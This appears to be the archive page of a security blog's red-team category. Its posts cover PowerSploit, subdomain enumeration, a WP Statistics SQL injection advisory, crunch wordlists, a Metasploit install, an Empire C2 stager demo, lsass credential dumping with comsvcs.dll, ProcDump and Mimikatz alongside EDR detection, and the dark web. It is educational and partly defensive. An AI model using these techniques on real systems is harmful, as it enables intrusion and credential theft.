Category Archives: RedTeam

Importing Module in Powershell

Modules are typically work in Powershell directly. “Get-Module” command can be used to see imported modules.

“Get-Module -ListAvailable” command show the modules available.

For the additional modules we want to use, we should import them first. Once we import the module, we can use its all commands anymore. We will add PowerSploit as example. PowerSploit project is a project no longer supported but sometimes we may want to use its capabilities. For importing, we firstly download the package from here. After downloading the module, we need to copy it to one of the module folders in PC. There are different module locations and we can see them with “$Env:PSModulePath” command.

We create a folder called PowerSploit and copy all files here from the downloaded package.

“Import-Module PowerSploit” command will install the module and all its commands will be available for us to use.

“Get-Command -Module PowerSploit” command can list all commands of this module.

“Get-Help <command>” command will show you the usage of the commands.

Subdomain Enumeration

Subdomain enumeration is an information gathering technique. It can be used to define the all sites opened to the internet in a company. In large organizations, it is very common to have some forgotten websites that having vulnerabilities or some sensitive data. So, subdomain enumeration also important for bug bounty.

The first technique is searching for passive dns information. There are a lot of ways to search for dns information however it should also be noted that the DNS information of closed servers may remain in the cache.

DNSdumpster.com: can give archive information about the domain also with some additional information like geolocation, nmap port scan, visualization of the domain mapping, and HTTP responses to check whether the site is alive or not.

crt.sh: is another interesting tool for searching for SSL certificates used by a domain and its subdomains.

Virustotal: When you search a domain in virustotal, it gives you all subdomains and additional information about the domain.

Other technique is automated.

amass: has a lot of options showing subdomains and things associated with it.

Sublist3r: Sublister lists subdomains of a domain, meanwhile it has a bruteforce module. Domain wordlists can be used with this module called subbrute.

#sublist3r -v -d facebook.com

SQL Injection Vulnerability in WPStatistics

WPStatistics, as the name suggests, a plugin allows site owners see and show their visitor count. It also brings IP address and country details of the visitors.

Wordfence Threat Intelligence team announced that they find a vulnerability in WPStatistics plugin. This plugin is installed more than 600.000 WordPress website. This is an SQL-injection vulnerability and allows visitors reach all kinds of information including web database, emails, and passwords.

Description: Unauthenticated Time-Based Blind SQL Injection
Affected Plugin: WP Statistics
Plugin Slug: wp-statistics
Affected Versions: < 13.0.8
CVE ID: CVE-2021-24340
CVSS Score: 7.5 (High)
CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Fully Patched Version: 13.0.8

WPStatistics lets administrators to see page statistics like which page gets how much traffic and according to the researchers, this feature allows attackers to reach database as unauthorized. “As this was a Time-Based Blind SQL injection vulnerability, exfiltrating information would be a relatively slow process, and it would be impractical to use it to extract bulk records, but high-value information such as user emails, password hashes, and encryption keys and salts could be extracted in a matter of hours with the help of automated tools such as sqlmap. In a targeted attack, this vulnerability could be used to extract personally identifiable information from commerce sites containing customer information. This underscores the importance of having security protections with an endpoint firewall in place wherever sensitive data is stored..” written in their post.

Creating Wordlist for Brute Force Attack

Brute force is an old attack technique but it can be still gold. For brute force attack, we need a wordlist/password list that will be tried by the tool we use, including possible passwords. Then, the tool will try thousands of these passwords per second. This is also referred to dictionary attack. The stronger your list is, the more successful you will be on cracking passwords.

For different targets, we may need different wordlists. Sometimes we would have some indicators about the target’s password since the knowledge about the target, like children’s name, pet’s name, birthday, etc. We may also know the password policy of the application, maybe having a policy with minimum 12 characters. In such cases, we may need different wordlists, that we can use for different targets. And a correct wordlist we have, saves our time. Especially, considering how long brute force attack takes, it can save our hours or days.

“Crunch” is a tool that enables us to create custom wordlists in the way we want. Both Kali and Parrot include crunch. It is very easy to create wordlists with crunch. Let’s take a look;

I will use Parrot for crunch, and it is in Pentesting > Password Attacks > Password Profiling & Wordlists menu in Parrot.

Usage:

Crunch does not provide much information about its usage at the beginning. The screenshot below shows the opening screen of crunch;

The basic syntax is;
# crunch <min> <max> <char set> -o <output file>
min = Minimum password length
max = Maximum password length
char set = The character set to be used generating passwords
-o = Wordlist file being created by crunch


By default, when we want to generate a wordlist for 8 characters, crunch estimates how large the file be;

By default, this command will generate password with small letters only. If we want a wordlist with 8 characters mixed with small letters and numbers, we can type like below;

We can define the character set as we want. Sure, the creation of the file takes much time, and it becomes a very big file. So, it would be better to guess some indicators about the password and create a wordlist for that.

It is also possible to use charsets defined in /usr/share/rainbowcrack/charset.txt file. We can get the same file with the command below;

The charsets in charset.txt is;

System Analysis with Process Explorer

Computer forensics is a set of methodological techniques to gather, identify and present evidence from digital equipment. There are many different techniques required. One of them is getting the system information. Process Explorer is a tool helping you to get system information from any Windows machine.

Process Explorer (procexp64.exe) is a SysInternals tool that can be downloaded from internet. Once you run the tool, it lists all running processes on the left pane and details of these processes on the right pane.

To view System Information, click View in the menu bar and click System Information.. The System Information wizard displays global system performance metrics just like Task Manager.

To view a process’s DLLs, just select a process from the main menu and click View > Lower Pane View > DLLs menu.

To view the properties of the DLL, just right click on the required DLL and select Properties. This menu displays two different tabs called Image and String. The Image tab contains details of the DLL. You can verify the DLL with Verify button to check its signature.

Once you click the Verify button, if the company’s name appears as Microsoft Windows, then it says process is legitimate.

String tab lists any Unicode strings found in the selected process. This tab helps you to determine whether the process is associated with any malware. When the String tab is clicked, there are two options called Image and Memory. These tabs show image or memory strings.

You can also save Image and/or Memory strings as text file.

Process Explorer also can show handles of the processes. From the main menu, View > Show Lower Pane > Handles menu shows the handles of the processes. To view handle properties, right click on the required handle and select Properties.

The Security tab displays the level of security assigned to the handle. You can also close the handle with right clicking the handle.

How to Install Metasploit on Ubuntu

If you are familiar with infosec, you must know already what Metasploit is. So, I will not explain it here again. Metasploit is a predefined tool in Kali but if you use Ubuntu like me, it is better to install Metasploit on it even if switching to Kali for using. It is very easy to install Metasploit on Ubuntu (all versions). 

Firstly, you must update the system;

    #sudo apt update
    #sudo apt dist-upgrade

When your Ubuntu is updated, to get installer for Metasploit;

    #cd /tmp
    #curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

After getting installer, use these commands to make it executable and run it;

    #chmod +x msfinstall
    #sudo ./msfinstall

After installation, run commands below to enable and start local database (you must run this command with a non-root user);

    $msfdb init

$ msfdb init
Creating database at /home/attacker/.msf4/db
Starting database at /home/attacker/.msf4/db…success
Creating database users
Writing client authentication configuration file /home/attacker/.msf4/db/pg_hba.conf
Stopping database at /home/attacker/.msf4/db
Starting database at /home/attacker/.msf4/db…success
Creating initial database schema
[?] Initial MSF web service account username? [attacker]:
[?] Initial MSF web service account password? (Leave blank for random password):
Generating SSL key and certificate for MSF web service
Attempting to start MSF web service…success
MSF web service started and online
Creating MSF web service user attacker

    ############################################################
    ##              MSF Web Service Credentials               ##
    ##                                                        ##
    ##        Please store these credentials securely.        ##
    ##    You will need them to connect to the webservice.    ##
    ############################################################

MSF web service username: attacker
MSF web service password: WDq33xRU6lVpVy+7bvdISdg9KusbHy7rfXSguE7GoQs=
MSF web service user API token: 8d4e7374d90b19f1a20a99da46cc2bc07684244e5b30b1061990be11fc31fbf5ccc761011a98c241


MSF web service configuration complete
The web service has been configured as your default data service in msfconsole with the name “local-https-data-service”

If needed, manually reconnect to the data service in msfconsole using the command:
db_connect –token 8d4e7374d90b19f1a20a99da46cc2bc07684244e5b30b1061990be11fc31fbf5ccc761011a98c241 –cert /home/attacker/.msf4/msf-ws-cert.pem –skip-verify https://localhost:5443

The username and password are credentials for the API account:
https://localhost:5443/api/v1/auth/account

If you see the text above, it means Metasploit is ready to use;

    $msfconsole

$ msfconsole
                                                  

     .~+P“““-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-““`                        “““““““`          `
+++++++++++++++++++++++sydhyoyso/:.““…`…-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
–.`                 .-.-…-////+++++++++++++++////////~~//////++++++++++++///
                                `……………`              `…-/////…`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\…//M\\…/hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/“-hd:  “                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-“““       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:“`-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso–/ydh//+s+/ossssso:–syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/…osydh/-+oo:-`o//…oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd–:mN/`           ||–X–||          ||–X–||
………./yddy/:…+hmo-…hdd:…………\\=v=//…………\\=v=//………
================================================================================
=====================+——————————–+=========================
=====================| Session one died of dysentery. |=========================
=====================+——————————–+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It’s always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.0.13-dev-                         ]
+ — –=[ 2072 exploits – 1120 auxiliary – 352 post       ]
+ — –=[ 592 payloads – 45 encoders – 10 nops            ]
+ — –=[ 7 evasion                                       ]

Metasploit tip: View advanced module options with advanced

msf6 >

 

C&C with Empire – A Mitre Att&ck T1071 and T1086 Demo

.. a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. It premiered at BSidesLV in 2015.
ReadMe file of Empire 

Empire is a publicly available post-exploitation framework used by nation state threat actors and red teams. This demo is about gaining C&C and associated to MITRE ATT&CK (r) Tactic: Command and Control and Technique: T1086, T1071.

It is important to install Empire with this command to use all functions of it;

        git clone https://github.com/BC-SECURITY/Empire

After installing Empire, we are creating a listener on port 80. I am using Ubuntu for this demo.

After enabling listener, we must use a stager. Here, we are using a batch stager;

With executing the commands above, a malicious batch file has been created in /tmp/ folder. When the victim executed this file in his/her machine, we get a session. With the “agents” command, we can see active sessions like below. Then with the “interact <agent id>” command, we can get the C&C connection to the victim. 

Empire is a good and fast framework for C&C. But if we do not make obfuscation, it is very possible to detect these processes for defense teams. In EventViewer, we can find logs of the malicious behaviors;

For defense, it is important to use an EDR solution on endpoint machine. You can find here is my EDR Choosing Guide post. 

Credential Dumping – Attack and Defense Techniques (MITRE ATT&CK T1003)

Credential Dumping

As MITRE says on its website, adversaries dump credentials to obtain login credentials to perform lateral movement when they got access to a computer. Several tools and techniques may be used to dump credentials of a computer. Here, I will try to show two different credential dumping techniques and prevention of it using FireEye’s Endpoint Security product, as a quick demo.

lsass

Before demo, I wanna give a short brief about lsass. LSA (Local Security Authority) is a process that authenticates user to computer. It checks SAM (Security Accounts Manager) database to validate user information. LSASS.exe (Local Security Authority Subsystem Service) is the process that is responsible for enforcing the local security policy on the system. If someone can dump lsass on the computer and get this dump file, it means the users’ credentials are stolen because lsass stores the credentials as clear text. 

FireEye HX Process Guard

HX is the Endpoint Security producth of FireEye as you know already. I will not explain what it is and what it does here but typically it is an EDR solution with AV and some other prevention modules also. I wanted to try its Process Guard module, basically blocking attackers to dump lsass process. 

“The Process Guard Module for FireEye Endpoint Security prevents attackers from obtaining access to credential data or key material stored within the lsass.exe process, thus protecting endpoints against common credential theft attacks” says FireEye about Process Guard. 

Here, I will try to show some dump techniques to dump lsass and how Process Guard preventing it. This techniques are associated to MITRE ATT&CK (r) Tactic: Credential Access and Technique: T1003

Credential Dumping with comsvcs.dll

comsvcs.dll is a part of Windows OS. It is a system file and hidden. It is found in \Windows\System32 and can call minidump with rundll32.exe, so it can be used to dump credentials via lsass.exe process. 

Firstly, process ID of lsass.exe process must be identified;

Then, the command below will dump the lsass;

A file about 48MBs being created with this process;

Now, it is time to use Mimikatz and get the passwords as clear text or hashes of the passwords (depends on the OS);

As you can see, it is very easy to get the credentials of the user of a compromised computer, if you do not prevent lsass.exe process against malicious behaviours. Now, I will try to prevent it using FireEye HX’s Process Guard module. For this, I enable Process Guard module on my computer’s policy;

lsass dump command again;

After that, when I check the created dump file, I can see a 0MB sized file has been created;

When I check Process Guard module in HX’s console, I can see HX has detected this behavior done by PowerShell;

Credential Dump with ProcDump

ProcDump is a Sysinternals tool used to generate memory dumps of applications. After disabled Process Guard module on HX again, I try to dump lsass using ProcDump;

A 48MBs sized file has been created;

Again Mimikatz and get the passwords or hashes (depends on the OS);

Then, let’s try again after enabling Process Guard. I try ProcDump again, but this time Process Guard is enabled;

It got error while creating the file and could not create any dump file. 
NOTE 1: This tests are done while Antivirus of HX is disabled. Otherwise, AV would block and delete or quarantine Mimikatz. This is an alarm of this behavior;

NOTE 2: Even if you do not enable Process Guard and Antivirus at the same time, HX generates an IOC alert for these attacks. The IOC says us “-ma” command is being used with “lsass.exe” on cmd. This attack and IOC are associated to MITRE ATT&CK (r) Tactic: Credential Access and Technique: T1003

Dark Web; Anonymity and Privacy

While talking on Dark Web, one is the most confused concepts with Dark Web is Deep Web. But first, I want to touch Surface Web. Surface Web is the indexable part of the internet. This includes all websites that you can find via search engines like Google, Yahoo, Bing, etc. Deep Web means everything else. It is everything on the internet that cannot be indexed. Deep Web is any system requires login credentials. Social media shares, personal data like credit card or medical information, company databases and more, create deep web.


Dark Web, is a part of the internet that cannot be indexable Only can be accessible via private softwares lie Tor (or the Onion Router). Tor is a distributed network where traffic is bounced between various routers (https://www.torproject.org/).
The poster below is showing the concepts of the internet (https://coar.risc.anl.gov/wp-content/uploads/2016/05/DarkNet_Poster_R8-622×1024.png)

Privacy
Privacy is the most important concern for people today, with the rise of internet and personal cloud usage. People want to feel safe and not monitored. With the sites visited or applications, these websites can collect some tracking actions of the user. Using the information collected with these tracking actions, simply, the websites can perform targeted advertising, moreover location based advertising to the user. Our internet usage is becoming a way for vendors, collecting information about us. Using Dark Web provide users making their online activities anonymously. Websites or applications cannot collect these type of data while using Dark Web.
Criminals
Since its anonymity and privacy, most people think that using Dark Web is illegal, because criminals use it to protect themselves. Criminals create online markets for selling their illegal materials. But also law enforcement agents such as police also uses Dark Web to capture these criminals.
Last Words
One of the most popular marketplace is Silk Road. Silk Road started for selling magic mushrooms at first, but then, grew to be used for other drugs also. Another popular marketplace is Wallstreet Market. Wallstreet Market offers goods like drugs, jewellery, malware, fraud information, stolen data, etc.  
Dark Web markets are not just buying or selling illegal goods. These markets can provide a better pricing since there is no anyone between the seller and the buyer, there is no taxes and advertisements, for also legal services, electronics, vegetables and etc. However, I think most people like to make shopping without receiving offers, based on the previous purchases, since the market does not collect any information about you.
People, mostly users away from these technologies think that Dark Web is a place where they need too much technical information to use it. However, there is not much difference between Surface Web and Dark Web. Only the softwares to reach there and the anonymity and privacy are the differences. Meanwhile, people have to be familiar with cryptocurrency technology tos hop from Dark Web.